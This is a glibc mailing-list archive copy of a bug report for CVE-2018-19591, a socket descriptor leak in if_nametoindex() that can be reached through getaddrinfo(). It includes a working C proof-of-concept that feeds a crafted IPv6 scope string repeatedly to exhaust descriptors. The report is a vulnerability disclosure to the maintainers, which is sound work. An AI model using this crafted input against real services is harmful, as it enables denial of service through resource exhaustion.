This is the mail archive of the glibc-bugs@sourceware.org mailing list for the glibc project.

Index Nav:	[Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav:	[Date Prev] [Date Next]	[Thread Prev] [Thread Next]
Other format:	[Raw text]

[Bug network/23927] New: Linux if_nametoindex() does not close descriptor (CVE-2018-19591)

From: "guidovranken at gmail dot com" <sourceware-bugzilla at sourceware dot org>
To: glibc-bugs at sourceware dot org
Date: Tue, 27 Nov 2018 09:24:54 +0000
Subject: [Bug network/23927] New: Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
Auto-submitted: auto-generated

https://sourceware.org/bugzilla/show_bug.cgi?id=23927

            Bug ID: 23927
           Summary: Linux if_nametoindex() does not close descriptor
                    (CVE-2018-19591)
           Product: glibc
           Version: 2.28
            Status: UNCONFIRMED
          Severity: normal
          Priority: P2
         Component: network
          Assignee: unassigned at sourceware dot org
          Reporter: guidovranken at gmail dot com
  Target Milestone: ---

In sysdeps/unix/sysv/linux/if_index.c, __if_nametoindex() creates a socket
descriptor but does not close it if the 'ifname' parameter is too long. This is
a resource leak (CWE-404).

Additionally, it is possible to call getaddrinfo() with a crafted 'node'
parameter, that leads to the offending code in __if_nametoindex().

In short, untrusted hostname resolutions (via getaddrinfo()) lead to descriptor
exhaustion.

MITRE has assigned CVE-2018-19591 for this issue.

Attribution: Guido Vranken

A proof-of-concept follows:

#include <errno.h>
#include <net/if.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

static int detect_open_descriptors(void)
{
    int i = 0;
    int fd_count = 0;
    int max_fd_number = 0;
    struct stat stats;
    max_fd_number = getdtablesize();
    struct rlimit rlimits;
    getrlimit(RLIMIT_NOFILE, &rlimits);
    for ( i = 0; i <= max_fd_number; i++ ) {
        fstat(i, &stats);
        if ( errno != EBADF ) { fd_count++; }
    }
    return fd_count;
}

int main(void)
{
    struct addrinfo hints, *res;
    void *ptr;

    memset (&hints, 0, sizeof (hints));
    hints.ai_socktype = SOCK_STREAM;

    printf("Open file descriptors before call to getaddrinfo: %d\n",
detect_open_descriptors());
    for (int i = 0; i < 1500; i++) {
        getaddrinfo("FEA0::%AAAAAAAAAAAAAAAA", NULL, &hints, &res);
        printf("Open file descriptors after call to getaddrinfo: %d\n",
detect_open_descriptors());
    }

    return 0;
}

-- 
You are receiving this mail because:
You are on the CC list for the bug.

Follow-Ups:
- [Bug network/23927] Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
  - From: fweimer at redhat dot com
- [Bug network/23927] Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
  - From: schwab at linux-m68k dot org
- [Bug network/23927] Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
  - From: fweimer at redhat dot com
- [Bug network/23927] Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
  - From: cvs-commit at gcc dot gnu.org
- [Bug network/23927] Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
  - From: fweimer at redhat dot com
- [Bug network/23927] Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
  - From: cvs-commit at gcc dot gnu.org
- [Bug network/23927] Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
  - From: cvs-commit at gcc dot gnu.org
- [Bug network/23927] Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
  - From: cvs-commit at gcc dot gnu.org
- [Bug network/23927] Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
  - From: fweimer at redhat dot com

Index Nav:	[Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav:	[Date Prev] [Date Next]	[Thread Prev] [Thread Next]